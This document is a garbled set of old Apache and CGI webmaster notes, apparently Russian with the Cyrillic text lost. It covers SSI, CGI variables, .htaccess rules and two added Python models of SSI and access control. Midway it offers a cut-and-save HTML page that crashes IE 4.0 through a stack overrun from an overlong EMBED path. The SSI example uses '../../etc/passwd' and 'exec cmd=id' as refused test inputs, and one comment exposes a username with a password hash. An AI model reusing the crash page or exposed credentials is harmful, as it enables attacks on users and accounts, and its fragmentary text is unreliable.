tcp www.host.com
( 80)
GET /local/url/file/name.html HTTP/1.0
Host: www.host.com
Referer: url_____
$ telnet www 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /index.html HTTP/1.0
Enter
HTTP/1.1 ?
"Range: bytes nnn-".
206 - " "
, 200
SSI - Server Side Includes
, www.apache.org
0. SSI- Last-modified,
XBitHack full
chmod g+x file.shtml
1. SSI ,
/etc/httpd/conf/access.conf :------------------------
# ""
Options +Includes # Options All
/etc/httpd/conf/srm.conf :------------------------
AddType text/html .shtml
AddHandler server-parsed .shtml
2. SSI .shtml
charset=
The value will often be enclosed in double quotes; many commands only allow a single attribute-value pair.
The allowed ELEMENTS are:
config -
config
errmsg - ,
sizefmt -
timefmt -
var -
exec - shell CGI-
cgi - (%-encoded) URL relative path to the CGI script.
cmd - shell
fsize -
file -
virtual - (%-encoded) URL-path relative
flastmod -
include -
file -
virtual - URL -
Include variables
These are available for the echo command, and to any program
invoked by the document.
DATE_GMT
The current date in Greenwich Mean Time.
DATE_LOCAL
The current date in the local time zone.
DOCUMENT_NAME
The filename (excluding directories) of the document requested
by the user.
DOCUMENT_URI
The (%-decoded) URL path of the document requested by the user.
Note that in the case of nested include files, this is not the URL for the current document.
LAST_MODIFIED
The last modification date of the document requested by the user.
If server side includes are enabled, you will see data values below:
The date is:
The current version of the server
The CGI gateway version
The server name
This file is called:
This file's URI
The query string
This file was last modified:
The size of the unprocessed file
sample.html was last modified
You are using
You came from
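As an added example (not code from the original page or from the Apache documentation), a small SSI expander over constructed in-memory documents that walks the elements and variables listed above: config, echo, include, fsize and flastmod. It confines file= includes as the rules above require and refuses exec, which is what Options IncludesNOEXEC does; DOCS, process, fmt and ERRMSG are the example's own names.

```python
import re
from datetime import datetime, timezone

# Constructed in-memory documents: URL path -> (body, last-modified as POSIX seconds).
DOCS = {
    "/index.shtml": ('<!--#config timefmt="%Y-%m-%d" -->Date: <!--#echo var="DATE_GMT" -->\n'
                     'Footer: <!--#include virtual="/inc/footer.html" -->\n'
                     'Footer size/mtime: <!--#fsize virtual="/inc/footer.html" -->'
                     ' <!--#flastmod virtual="/inc/footer.html" -->\n'
                     'Escape: <!--#include file="../../etc/passwd" -->\n'
                     'Exec: <!--#exec cmd="id" -->', 1735689600),
    "/inc/footer.html": ("-- footer --", 1704067200),
}
DIRECTIVE = re.compile(r'<!--#(\w+)\s*((?:\w+="[^"]*"\s*)*)-->')
ATTR = re.compile(r'(\w+)="([^"]*)"')
ERRMSG = "[an error occurred while processing this directive]"
def fmt(ts, timefmt):
    return datetime.fromtimestamp(ts, timezone.utc).strftime(timefmt)
def process(uri, now, cfg=None, depth=0):
    """Expand the SSI directives in DOCS[uri]; `now` is a POSIX timestamp, injected so output is reproducible."""
    cfg = dict(cfg or {"errmsg": ERRMSG, "timefmt": "%A, %d-%b-%Y %H:%M:%S %Z"})
    body, mtime = DOCS[uri]
    def resolve(attrs):
        # file= is relative to the current document and may not start with / or contain ..; virtual= is an absolute URL path.
        if "file" in attrs:
            f = attrs["file"]
            return None if f.startswith("/") or ".." in f else uri.rsplit("/", 1)[0] + "/" + f
        return attrs.get("virtual")
    def expand(m):
        cmd, attrs = m.group(1), dict(ATTR.findall(m.group(2)))
        if cmd == "config":            # errmsg= / timefmt= apply to the directives that follow
            cfg.update(attrs)
            return ""
        if cmd == "echo":
            variables = {"DATE_GMT": fmt(now, cfg["timefmt"]), "DOCUMENT_URI": uri,
                         "DOCUMENT_NAME": uri.rsplit("/", 1)[1],
                         "LAST_MODIFIED": fmt(mtime, cfg["timefmt"])}
            return variables.get(attrs.get("var"), "(none)")
        target = resolve(attrs)
        if cmd in ("include", "fsize", "flastmod") and target in DOCS and depth < 8:
            if cmd == "include":
                return process(target, now, cfg, depth + 1)
            if cmd == "fsize":
                return str(len(DOCS[target][0].encode()))
            return fmt(DOCS[target][1], cfg["timefmt"])
        # exec (cmd= or cgi=) is refused outright, the effect of Options IncludesNOEXEC; unresolvable paths and unknown elements fall back to errmsg.
        return cfg["errmsg"]
    return DIRECTIVE.sub(expand, body)
```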
# SSI perl-cgi
# Emulates a server-side include from a CGI script: the text before the matched
# directive is printed, the named file is copied in, then the remainder follows.
# The match patterns (the empty // below) are not preserved in this copy of the text.
if (//) {
    print $`;                  # text before the directive
    $tmp = $';                 # text after it, printed once the include is done
    open (INC,"$inc") || die "Can't Open $inc: $!\n";
    while (<INC>) {
        if (//) {              # substitute the current date as dd.mm.yy
            @time = localtime ( time() ); $time[4]++;   # month is 0-based
            if ($time[4] < 10) { $time[4] = "0" . "$time[4]"; }
            s//$time[3].$time[4].$time[5]/g;            # $time[5] is years since 1900
        }
        print $_;
    }
    close(INC);
    print "$tmp";
}
httpd.conf
SetEnvIfNoCase Referer rusf\.ru internal_referer
SetEnvIfNoCase User-Agent Teleport internal_referer
SetEnvIfNoCase User-Agent Vampire internal_referer
SetEnvIfNoCase User-Agent ReGet internal_referer
SetEnvIfNoCase User-Agent GetRight internal_referer
SetEnvIfNoCase User-Agent Wget internal_referer
ErrorDocument 403 http://rusf.ru/books/index.htm
order deny,allow
deny from all
allow from env=internal_referer
# No offline browsers robots.txt (one User-Agent line per product token)
User-Agent: DISCo Pump
User-Agent: Wget
User-Agent: WebZIP
User-Agent: Teleport Pro
User-Agent: WebSnake
User-Agent: Offline Explorer
User-Agent: Web-By-Mail
Disallow: /
, "cl"
http://hoohoo.ncsa.uiuc.edu/file.html#cl
Request for a CGI script with no extra path information and no query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi
Request for a script with extra path information, and no query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi/extra/path
Request for a script with no extra path information, and an ISINDEX query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi?query
Request for a script with extra path information as well as an ISINDEX query.
http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi/extra/path?a+query
, 0,1,1 2 :
extra path - " ",
query - "?"
extra path image map -
query ISINDEX
CGI- :
REMOTE_ADDR=127.0.0.1
REMOTE_HOST=localhost
HTTP_REFERER=http://www.ac.msk.su:80/cgi-bin/html-KOI?KSP/bachurin.txt
REQUEST_METHOD=GET
QUERY_STRING=query
PATH_INFO=/marshrut
PATH_TRANSLATED=/home/httpd/docs/marshrut
SCRIPT_NAME=/cgi-bin/proba
HTTP_USER_AGENT=NCSA Mosaic for the X Window System/2.4 libwww/2.12 modified
checkbox':
# ISINDEX - CGI $1
# METHOD=GET -
# QUERY_STRING
# http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi?button1=on&button2=off
# POST, PUT.
CONTENT_LENGTH
- CONTENT_TYPE
<FORM ACTION="http://hoohoo.ncsa.uiuc.edu/cgi-bin/test-cgi" METHOD="POST">
:
Status: 200 OK
Status: 404 File not found
Content-type: text/html
, -
, , :
Location: /path/doc.txt
Location: gopher://gopher.ncsa.uiuc.edu/
-
, :
--- start of output ---
HTTP/1.0 200 OK
Date: Tuesday, 26-Dec-95 15:17:10 GMT
Server: NCSA/1.3
MIME-version: 1.0
Content-type: text/html
Last-modified: Tuesday, 24-Dec-95 15:15:41 GMT
Content-length: 3132
This is a plaintext document generated on the fly just for you.
--- end of output ---
$SERVER_PROTOCOL $SERVER_SOFTWARE
MSIE 4.0. 4.01 can be crashed with a little help of the < EMBED > tag.
<EMBED SRC=file://C|/A.ABOUT_200_CHARACTERS_HERE___________________>
opens a dialog box and closes IE 4.0. the long file extension causes stack overrun.
--------cut here and save as crashmsie.html---------------------
Trying to crash IE 4.0
<EMBED
SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789>
40
80 160 170 180 190 200
</HTML>
---------------------------------------------------------------
.htaccess
order deny,allow
deny from all
allow from polimos.ras.ru localhost
Order deny,allow
Allow from .abc.ru
Deny from all
Satisfy any
AuthType Basic
AuthName lenta.ru
AuthUserFile /home/www/passwd
# moshkow:1HrhNpfYnwTau crypt()
require valid-user
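The three access snippets above (the rusf.ru SetEnvIf rules, the polimos.ras.ru allow list, and the .abc.ru block with Satisfy any) as an added Python model of the Apache 1.3 access decision. This is example code, not from the page or from Apache; the function names and the sample host names and addresses are constructed, and Referer and User-Agent are client-supplied headers, so the first snippet limits casual leeching rather than authenticating anyone.

```python
import re

# SetEnvIfNoCase rules from the httpd.conf above: (header, regex, variable).
# Download tools send no Referer, so the config admits them by User-Agent instead.
SETENVIF = [("Referer", r"rusf\.ru", "internal_referer")] + [
    ("User-Agent", ua, "internal_referer")
    for ua in ("Teleport", "Vampire", "ReGet", "GetRight", "Wget")]

def set_env(rules, headers):
    """SetEnvIfNoCase: set the variable when the header's value matches the regex, ignoring case."""
    return {var for header, pattern, var in rules
            if re.search(pattern, headers.get(header, ""), re.IGNORECASE)}

def rule_matches(rule, host, addr, env):
    """One Allow/Deny from argument: all, env=VAR, an IP address, a host name, or a .domain suffix."""
    if rule.startswith("env="):
        return rule[4:] in env
    rule = rule.lower()
    if rule == "all":
        return True
    if rule.startswith("."):
        return host.lower().endswith(rule)
    return rule in (host.lower(), addr)

def host_access(order, allow, deny, host, addr, env=frozenset()):
    """Order deny,allow: Deny is evaluated first and Allow overrides it; anything unmatched is
    admitted. Order allow,deny: Allow first, Deny overrides; anything unmatched is refused."""
    in_allow = any(rule_matches(r, host, addr, env) for r in allow)
    in_deny = any(rule_matches(r, host, addr, env) for r in deny)
    if order.lower() == "deny,allow":
        return in_allow or not in_deny
    return in_allow and not in_deny

def decide(access_ok, require_auth=False, auth_ok=False, satisfy="all"):
    """Satisfy all (default): host access and `require` must both pass; Satisfy any: either one."""
    if not require_auth:
        return access_ok
    return (access_ok or auth_ok) if satisfy == "any" else (access_ok and auth_ok)

def anti_leech(headers, host="client.example", addr="192.0.2.10"):
    """The rusf.ru snippet: order deny,allow; deny from all; allow from env=internal_referer."""
    env = set_env(SETENVIF, headers)
    return host_access("deny,allow", ["env=internal_referer"], ["all"], host, addr, env)

def abc_ru_htaccess(host, addr, auth_ok):
    """The second .htaccess: Allow from .abc.ru, Deny from all, Satisfy any, require valid-user."""
    ok = host_access("deny,allow", [".abc.ru"], ["all"], host, addr)
    return decide(ok, require_auth=True, auth_ok=auth_ok, satisfy="any")
```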